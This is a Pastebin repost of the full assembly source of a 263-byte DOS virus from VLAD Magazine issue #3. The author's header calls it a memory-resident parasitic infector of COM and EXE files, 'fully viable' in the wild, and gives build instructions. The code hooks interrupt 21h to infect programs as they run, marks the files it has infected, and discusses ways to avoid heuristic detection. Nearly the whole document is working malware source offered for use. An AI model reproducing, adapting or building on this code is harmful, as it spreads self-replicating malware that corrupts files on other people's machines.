Advertisement
FlyFar

VLAD Magazine - Issue #3 - Small Virus

Jun 28th, 2023
1,187
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
ASM (NASM) 10.23 KB | Cybersecurity | 0 0
  1. ;---------------------------------------------------------------------------
  2. ;
  3. ; Smallest Virus I Could Manage - 263 bytes
  4. ; The Smallest Virus I Could Manage
  5. ;
  6. ; In Nuke InfoJournal #5 I foolishly boasted about a 387-byte TSR COM/EXE
  7. ; parasitic infector I'd written.. well the days of semi-lameness are gone
  8. ; (that was almost 2 years ago now) and I've come up with the goods.
  9. ;
  10. ; This is the smallest virus I could figure out at this point in time.
  11. ; In all respects, it's a fully viable spreader in the wild, although it
  12. ; does have serious 'security' problems - it doesn't trap i24 (critical
  13. ; error handler), clean registers before returning control to the host, or
  14. ; even use i21 functions by chaining on to the old vector (it calls i21
  15. ; with an INT instruction).  I have no pretenses in that I fully don't
  16. ; expect to see this in the wild, since it was only written for
  17. ; investigative pleasure anyway, to see how small a virus could be
  18. ; written.
  19. ;
  20. ; There was another version of this virus which I gave out to a few people
  21. ; on #virus, which had a slight bug (rather, hasty oversight) in it, where
  22. ; I changed a bit of code and didn't change a corresponding line a few
  23. ; lines later.. which results in the i21 vector being partially
  24. ; overwritten and thus the machine will crash (bad side effect!), which
  25. ; was 291 bytes.  The difference between this virus and the 'old' one is
  26. ; that this one doesn't change the target EXE file's stack, simply leaving
  27. ; it and negating the need to carry the extra 4 bytes around with the
  28. ; virus, as well as cutting code size.  Also, the 'old' one didn't trigger
  29. ; any heuristic flags whereas this one does.  (see below)
  30. ;
  31. ; This virus is a memory-resident parasitic infector of COM and EXE files
  32. ; on execution, 263 bytes.  It doesn't reinfect memory OR files.
  33. ;
  34. ; The older revision (sm2.asm, and the bug-fix, sm2b.asm) avoided all
  35. ; heuristic flags (except maybe suspicious stack); it inserted the delta
  36. ; offset straight into the first instruction of the virus, instead of
  37. ; doing the usual 'call $+3/pop si/sub si,3'.  However this just took up
  38. ; too much code and besides, it's going to get caught anyway, so why
  39. ; bother?  So in this version, it was removed, but the lines are only
  40. ; commented out.  If, for some reason, you want to re-enable the old
  41. ; system, uncomment the appropriate lines and delete the lines with only a
  42. ; semicolon after them (ie not the ones with actual comments!).  Enabling
  43. ; this will bring the virus size up to all 268 bytes.
  44. ;
  45. ; In its current form, I think it's as optimized as I can make it.  Apart
  46. ; from the odd 1-byte improvement, any difference would require a change
  47. ; in viral architecture.  Some hardcore processor head would have to do it,
  48. ; perhaps they'd get a virus of 260 bytes.. but below that, I'm sure it'd
  49. ; have to be deficient or unreliable in some respect (as far as I can
  50. ; rationally extrapolate, judging how limited this virus is in avoiding
  51. ; detection).  I'm certainly not saying that a smaller virus cannot be
  52. ; written, however, because it's probably possible.  If I could see how,
  53. ; though, I'd do it! :)  Making this smaller would require the removal of
  54. ; 'safety' checks (eg bailing if the file can't be opened, bailing if the
  55. ; file is less than 24 bytes, etc).  However I consider these checks to be
  56. ; part of a viable virus, so I left them in.
  57. ;
  58. ; There isn't a great deal of commenting on this virus.  A few of the
  59. ; techniques just aren't applicable to viruses of the normal kind, so
  60. ; there's no real point.  To gain anything much out of examining this
  61. ; the source you more or less have to have a good idea of what's going on
  62. ; anyway.
  63. ;
  64. ;
  65. ; by T�L�N
  66. ;
  67. ; compile with a86, rename the .bin to a .com and it's ready to roll...
  68. ;
  69.  
  70. org 0
  71. @marker equ 19h
  72.  
  73. v_start:        ; mov si, 0100h
  74.                 call $+3        ;
  75.                 pop si          ;
  76.                 sub si, 3       ;
  77.  
  78.                 push ds
  79.                 xor ax, ax              ; this virus resides at the end
  80.                 mov es, ax              ; of the interrupt table & then some
  81.                 mov di, 200h
  82.                 push di
  83.                 cld
  84.                 scasw                   ; is the space clear?
  85.                 pop di
  86.                 jne v_exit
  87.  
  88.                 push si
  89.                 mov cx, v_len
  90.              db 02eh                    ; make CS source of movsb
  91.                 rep movsb               ; copy the virus to memory
  92.                 mov si, 21h*4           ; & save old i21 vector
  93.                 push si
  94.              db 26h                     ; make ES source of movsw
  95.                 movsw
  96.              db 26h
  97.                 movsw
  98.                 pop di
  99.                 mov ax, offset new21 + 200h
  100.                 stosw
  101.                 xchg ax, cx
  102.                 stosw                   ; capture int 21h
  103.                 pop si
  104. v_exit:         pop es
  105.                 add si, offset old_shit
  106.                 pop ax
  107.                 or sp, sp               ; COM or EXE determination
  108.                 push ax
  109.                 push cs
  110.                 pop ds
  111.                 jnz exit_exe
  112.  
  113. exit_com:       mov di, 100h            ; return to COM host
  114.                 push di
  115.                 movsw
  116.                 movsw
  117.                 ret
  118. exit_exe:       mov ax, es              ; return to EXE host
  119.                 add ax, 10h
  120.                 add word ptr [si+2], ax
  121.                 jmp dword ptr [si]
  122.  
  123. old_shit:       int 20h
  124.              dw 0
  125.  
  126. new21:          cmp ax, 4b00h           ; infect on execute
  127.                 je infect
  128.                 jmp exit21
  129.  
  130. infect:         push ax
  131.                 push bx
  132.                 push cx
  133.                 push dx
  134.                 push si
  135.                 push di
  136.                 push ds
  137.                 push es
  138.  
  139.                 mov ax, 3d02h           ; open the file
  140.                 int 21h
  141.                 jc bitch
  142.  
  143.                 push cs
  144.                 pop ds
  145.                 push cs
  146.                 pop es
  147.  
  148.                 xchg ax, bx
  149.                 mov ah, 3fh
  150.                 mov cx, 24
  151.                 mov dx, offset signature+200h
  152.                 int 21h                ; read header
  153.                 xor cx, ax
  154.                 jnz bitch1
  155.  
  156.                 mov si, dx
  157.                 push ax
  158.                 mov al, @marker
  159.                 cmp byte ptr [si+3], al ; is the infection marker present?
  160.                                         ;(com)
  161.                 je bitch2
  162.                 cmp byte ptr [si+12h], al       ; (exe)
  163.                 je bitch2
  164.  
  165.                 mov ax, 4202h           ; seek to EOF  dx:ax -> file len
  166.                 cwd
  167.                 int 21h                 ; cx is already zero
  168.                 push ax
  169.  
  170.                 mov di, offset old_shit+200h
  171.                 cmp byte ptr [si], 'M'
  172.                 je infect_exe
  173. infect_com:     push si
  174.                 movsw                   ; save first 4 of COM
  175.                 movsw
  176.                 pop di
  177.                 mov al, 0e9
  178.                 stosb
  179.                 pop ax
  180. ;                inc ah
  181. ;                mov word ptr [v_start+201h], ax
  182. ;                sub ax, 103h
  183.                 dec ax          ;
  184.                 dec ax          ;
  185.                 dec ax          ;
  186.                 stosw
  187.                 mov byte ptr [di], @marker      ; mark infection
  188.  
  189. write_us:       mov ah, 40h
  190.                 mov cx, v_len
  191.                 mov dx, 200h
  192.                 int 21h
  193.  
  194. write_hdr:      mov ax, 4200h
  195.                 cwd
  196.                 xor cx, cx
  197.                 int 21h
  198.  
  199.                 pop cx
  200.                 mov ah, 40h
  201.                 mov dx, offset signature+200h
  202.                 int 21h
  203.  
  204.                 push ax                 ; ambiguous instruction
  205.  
  206. bitch2:         pop ax
  207. bitch1:         mov ah, 3eh
  208.                 int 21h
  209. bitch:          pop es
  210.                 pop ds
  211.                 pop di
  212.                 pop si
  213.                 pop dx
  214.                 pop cx
  215.                 pop bx
  216.                 pop ax
  217. exit21:         jmp dword ptr cs:[old21+200h]
  218.  
  219. infect_exe:     push dx
  220.                 push si
  221.                 mov si, offset [exe_ip+200h]
  222.                 movsw                   ; save IP, CS
  223.                 movsw
  224.                 add ax, v_len           ; calculate part_page, page_cnt
  225.                 adc dx, 0               ; of infected file
  226.                 mov cx, 200h
  227.                 div cx
  228.                 pop di
  229.                 scasw
  230.                 scasw
  231.                 std                     ; a novel approach..
  232.                 or dx, dx
  233.                 jz noinc
  234.                 inc ax
  235. noinc:          stosw                   ; store the new values..
  236.                 xchg ax, dx
  237.                 stosw
  238.  
  239.                 pop dx
  240.                 pop ax
  241.                 mov cx, 10h             ; calculate # of paragraphs
  242.                 div cx                  ; in the uninfected file
  243.                 sub ax, word ptr [hdr_size+200h]
  244.  
  245.                 mov di, offset relo_cs+200h
  246.                 stosw                   ; & set new IP, CS (entry pt)
  247.                 xchg ax, dx
  248.                 stosw
  249. ;                mov word ptr [v_start+201h], ax
  250.                 mov ax, @marker
  251.                 stosw
  252.                 jmp short write_us
  253.  
  254.  
  255. v_end:
  256. old21   equ     v_end + 0
  257. signature       equ old21 + 4           ; where we load the host files header
  258. part_page       equ signature + 2       ; part-page at EOF
  259. page_cnt        equ part_page + 2       ; count of code pages
  260. hdr_size        equ page_cnt + 4        ; size of header in paragraphs
  261. minmem          equ hdr_size + 2        ; minimum memory required
  262. maxmem          equ minmem + 2          ; maximum memory required
  263. relo_ss         equ maxmem + 2          ; displacement of stack segment (SS)
  264. exe_sp          equ relo_ss + 2         ; stack pointer (SP)
  265. chksum          equ exe_sp + 2          ; -> infection marker
  266. exe_ip          equ chksum + 2          ; instruction pointer (IP)
  267. relo_cs         equ exe_ip + 2          ; displacement of code segment (CS)
  268.                                         ; 24 bytes for EXE header information
  269.  
  270. v_len equ v_end - v_start
  271.  
  272. ;
  273. ;-------the-end-------------------------------------------------------------
  274.  
Tags: virus
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement